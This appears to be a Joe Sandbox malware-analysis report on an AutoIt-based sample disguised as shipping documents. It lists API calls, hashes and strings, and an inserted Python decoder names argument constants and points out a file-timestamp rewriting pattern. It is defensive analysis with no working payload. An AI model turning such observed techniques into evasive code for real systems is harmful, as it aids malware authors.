                                                                                    • Opcode Fuzzy Hash: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                                                                    • Instruction Fuzzy Hash: CC21C5B5D55619EFEB00DFA4E849BEDBBF4FB09700F00812AF911A72A0EBB145448F95

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00B54706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C152F8,?,00B537AE,?), ref: 00B54724
                                                                                      • Part of subcall function 00B7050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B57165), ref: 00B7052D
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B571A8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B8E8C8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B8E909
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B8E947
                                                                                    • _wcscat.LIBCMT ref: 00B8E9A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                    • API String ID: 2673923337-2727554177
                                                                                    • Opcode ID: d8d46e6e91a2560dc747dda9c601d64d34d96f915d0b5056c7869e087bbd09e6
                                                                                    • Instruction ID: 95e4247cf390664c1cd1a98421725f11dc6e64cb45bb2b242dd18a93d69f0e41
                                                                                    • Opcode Fuzzy Hash: d8d46e6e91a2560dc747dda9c601d64d34d96f915d0b5056c7869e087bbd09e6
                                                                                    • Instruction Fuzzy Hash: 41718E715093019EC310EF65E841BAFBBE8FF86350B4089AEF855872B0EB719948CB52

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                                                                    • LoadIconW.USER32(00000063), ref: 00B53A76
                                                                                    • LoadIconW.USER32(000000A4), ref: 00B53A88
                                                                                    • LoadIconW.USER32(000000A2), ref: 00B53A9A
                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                                                                    • RegisterClassExW.USER32(?), ref: 00B53B16
                                                                                      • Part of subcall function 00B53041: GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                                                      • Part of subcall function 00B53041: RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                                                      • Part of subcall function 00B53041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B530AF
                                                                                      • Part of subcall function 00B53041: InitCommonControlsEx.COMCTL32(?), ref: 00B530CC
                                                                                      • Part of subcall function 00B53041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B530DC
                                                                                      • Part of subcall function 00B53041: LoadIconW.USER32(000000A9), ref: 00B530F2
                                                                                      • Part of subcall function 00B53041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B53101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                                                                    • Instruction ID: bf476b22b2713d337e84bfe596b45cbaba645da199cf42a221af1dd8ddf54a63
                                                                                    • Opcode Fuzzy Hash: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                                                                    • Instruction Fuzzy Hash: 90212772905309EFEB10DFA4EC49BDD7BF0FB49711F00816AE500A72A1D7B55A448B84

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00B536D2
                                                                                    • KillTimer.USER32(?,00000001), ref: 00B536FC
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B5371F
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B5372A
                                                                                    • CreatePopupMenu.USER32 ref: 00B5373E
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00B5374D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: a2e1825c452eadeb31f1b0840ec596138e5fc0ff39439e1cfb0d0624089ba6b5
                                                                                    • Instruction ID: 91ddd5d12f022b534c15da0734c42e2a78431dc73081d16e03203f96ca528fc6
                                                                                    • Opcode Fuzzy Hash: a2e1825c452eadeb31f1b0840ec596138e5fc0ff39439e1cfb0d0624089ba6b5
                                                                                    • Instruction Fuzzy Hash: 914146B2608505EBDB106F64DC49BFD37D4EB86782F1401EAFD02963E1DA709E499321

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                    • API String ID: 1825951767-3513169116
                                                                                    • Opcode ID: 62e29172603d251881b632c6882ab62c8a94714371fc42d22a9a59ac1c4c450f
                                                                                    • Instruction ID: aa0e5034db6873fba490870bac995b4fc435fa5ef4e2a0c37e90ed15c4929c5e
                                                                                    • Opcode Fuzzy Hash: 62e29172603d251881b632c6882ab62c8a94714371fc42d22a9a59ac1c4c450f
                                                                                    • Instruction Fuzzy Hash: E7A15D7290021D9ADB05EBA0DC95BEEB7F8FF15741F4404EAE816B7291EF745A08CB60

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399

                                                                                    Control-flow Graph
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B8D3D7
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • _memset.LIBCMT ref: 00B540FC
                                                                                    • _wcscpy.LIBCMT ref: 00B54150
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 3942752672-1585850449

                                                                                    Control-flow Graph
                                                                                    APIs
                                                                                      • Part of subcall function 00B54DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                                                                    • _free.LIBCMT ref: 00B8E263
                                                                                    • _free.LIBCMT ref: 00B8E2AA
                                                                                      • Part of subcall function 00B56A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 2861923089-1757145024

                                                                                    Control-flow Graph
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B535A1,SwapMouseButtons,00000004,?), ref: 00B535D4
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B535F5
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B53617
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125

                                                                                    Control-flow Graph
                                                                                    APIs
                                                                                      • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                                                                    • _free.LIBCMT ref: 00BB96A2
                                                                                    • _free.LIBCMT ref: 00BB96A9
                                                                                    • _free.LIBCMT ref: 00BB9714
                                                                                      • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                                                      • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                                                                    • _free.LIBCMT ref: 00BB971C
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2782032738-0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B8EA39
                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00B8EA83
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                      • Part of subcall function 00B70791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X
                                                                                    • API String ID: 3777226403-3081909835
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00BB98F8
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BB990F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    APIs
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                                                                      • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                                                                      • Part of subcall function 00B660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00B5F930), ref: 00B66154
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B5F9CD
                                                                                    • OleInitialize.OLE32(00000000), ref: 00B5FA4A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B945C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1986988660-0
                                                                                    • Opcode ID: e9746d6851ea0e081164b5dbef9103afb84feaa72be3cc83dbc3b581efcfbece
                                                                                    • Instruction ID: 58467768f47ddd3c81433d0aa3aeeb955ee91025df59434d8c80674cd4ff7166
                                                                                    • Opcode Fuzzy Hash: e9746d6851ea0e081164b5dbef9103afb84feaa72be3cc83dbc3b581efcfbece
                                                                                    • Instruction Fuzzy Hash: F781CCB0915A40CEC784DF29E8817DCBBE5FBDB306790C1AAA019CB3B1EB7044858F55
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B54370
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B54432
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1505330794-0
                                                                                    • Opcode ID: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                                                                    • Instruction ID: 0e6775b137a8643b284c84068eed8c9e284b7777b0bd54af16b024f9d97ba828
                                                                                    • Opcode Fuzzy Hash: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                                                                    • Instruction Fuzzy Hash: 45318071505701DFC721DF24D88479BBBF8FB49309F0049AEE99A87251E7B0A988CB52
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                                                      • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A192
                                                                                      • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A19C
                                                                                    • __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                                                      • Part of subcall function 00B7A1C8: GetModuleFileNameW.KERNEL32(00000000,00C133BA,00000104,?,00000001,00000000), ref: 00B7A25A
                                                                                      • Part of subcall function 00B7A1C8: ___crtMessageBoxW.LIBCMT ref: 00B7A308
                                                                                      • Part of subcall function 00B7309F: ___crtCorExitProcess.LIBCMT ref: 00B730A5
                                                                                      • Part of subcall function 00B7309F: ExitProcess.KERNEL32 ref: 00B730AE
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    • RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000000,?,?,?,00B70DD3,?), ref: 00B7575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    • Opcode ID: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                                                                    • Instruction ID: 052577923be417da4ba72afca69f90381bdf7b826858ae6ae5612e09afe001d2
                                                                                    • Opcode Fuzzy Hash: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                                                                    • Instruction Fuzzy Hash: 7801D231244A02DAE6292738AC82B6E63C8DB82762F1080A5F43DEB281DEB09D014660
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BB9548,?,?,?,?,?,00000004), ref: 00BB98BB
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BB98D1
                                                                                    • CloseHandle.KERNEL32(00000000,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB98D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                                                                    • Instruction ID: dddc0433c6970e43308bbddd74fe6aafe15e5d4121c257e4ab68b03d905cf05f
                                                                                    • Opcode Fuzzy Hash: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                                                                    • Instruction Fuzzy Hash: B2E08632146225B7D7211B54EC09FEABF59EF06B70F104121FB157A0E09BB11A119798
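The API lines in these function records print every argument as zero-padded hex, so the intent of a call such as the CreateFileW / SetFileTime / CloseHandle sequence above (open an existing file for write, rewrite its timestamps, close it) is only visible once the constants are named. The decoder below is an added example and is not part of the Joe Sandbox report or of the analysed sample; it parses a few lines constructed by copying records from this section and resolves the argument constants using Windows SDK values (winnt.h, fileapi.h, winuser.h, shellapi.h). The accepted line shape is an assumption about how the report renders calls, and the constant tables cover only the APIs that appear in these records.

```python
"""Decode argument constants in Joe Sandbox style API call lines (added example)."""
import re
from typing import Any, Dict, List, Optional

# Constructed input: API lines copied from the function records above. The report
# prints arguments as zero-padded hex and uses "?" for values it could not resolve.
SAMPLE_LINES = [
    "• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BB9548), ref: 00BB98BB",
    "• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BB9548), ref: 00BB98D1",
    "• Part of subcall function 00B70162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193",
    "• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B54874",
    "• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B54432",
    "• _memset.LIBCMT ref: 00B54370",
]

# Assumed line shape: "<api>.<module>(<args>), ref: <addr>"; CRT helpers have no parentheses.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([\w:@]+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

# Windows SDK constants for the calls seen in these records.
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_FLAGS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTR_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
SPI_NAMES = {0x2000: "SPI_GETFOREGROUNDLOCKTIMEOUT", 0x2001: "SPI_SETFOREGROUNDLOCKTIMEOUT"}
NIM_NAMES = {0: "NIM_ADD", 1: "NIM_MODIFY", 2: "NIM_DELETE"}


def _parse_arg(token: str) -> Any:
    """Hex token -> int, "?" -> None, anything else (a string literal) is kept verbatim."""
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token


def parse_api_line(line: str) -> Optional[Dict[str, Any]]:
    """Split one report line into api, module, argument list and call-site address."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [_parse_arg(a) for a in raw_args.split(",")] if raw_args else []
    return {"api": api, "module": module, "args": args, "ref": int(ref, 16)}


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as OR-ed names; bits the table does not know are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def decode_call(parsed: Dict[str, Any]) -> Dict[str, str]:
    """Name the constants of the calls that appear in the records above."""
    api, args = parsed["api"], parsed["args"]
    ints = [a if isinstance(a, int) else None for a in args]
    if api == "CreateFileW" and len(ints) >= 6 and None not in ints[1:6]:
        return {"access": decode_flags(ints[1], ACCESS_FLAGS),
                "share": decode_flags(ints[2], SHARE_FLAGS),
                "disposition": DISPOSITION.get(ints[4], hex(ints[4])),
                "attributes": decode_flags(ints[5], ATTR_FLAGS)}
    if ints and ints[0] is not None:
        if api == "MapVirtualKeyW":
            return {"vk": VK_NAMES.get(ints[0], hex(ints[0]))}
        if api == "SystemParametersInfoW":
            return {"action": SPI_NAMES.get(ints[0], hex(ints[0]))}
        if api == "Shell_NotifyIconW":
            return {"message": NIM_NAMES.get(ints[0], hex(ints[0]))}
    return {}


def decode_report_lines(lines: List[str]) -> List[Dict[str, Any]]:
    """Parse every line that matches the report shape and attach the decoded constants."""
    out = []
    for line in lines:
        parsed = parse_api_line(line)
        if parsed:
            parsed["decoded"] = decode_call(parsed)
            out.append(parsed)
    return out


if __name__ == "__main__":
    for rec in decode_report_lines(SAMPLE_LINES):
        print(f"{rec['ref']:08X} {rec['api']}.{rec['module']} {rec['decoded']}")
```

Run against the constructed lines, the CreateFileW call at 00BB98BB decodes to GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL; followed immediately by SetFileTime and CloseHandle on the same handle, that is the shape of a routine that rewrites an existing file's timestamps, which is worth noting during triage because it is the primitive behind timestomping (whether this sample uses it that way is not something the record alone shows). The MapVirtualKeyW arguments resolve to the modifier keys (VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU) and the SystemParametersInfoW pair to the foreground-lock timeout, both consistent with a scripting runtime rather than hand-written loader code.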
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00BB8D1B
                                                                                      • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                                                      • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                                                                    • _free.LIBCMT ref: 00BB8D2C
                                                                                    • _free.LIBCMT ref: 00BB8D3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
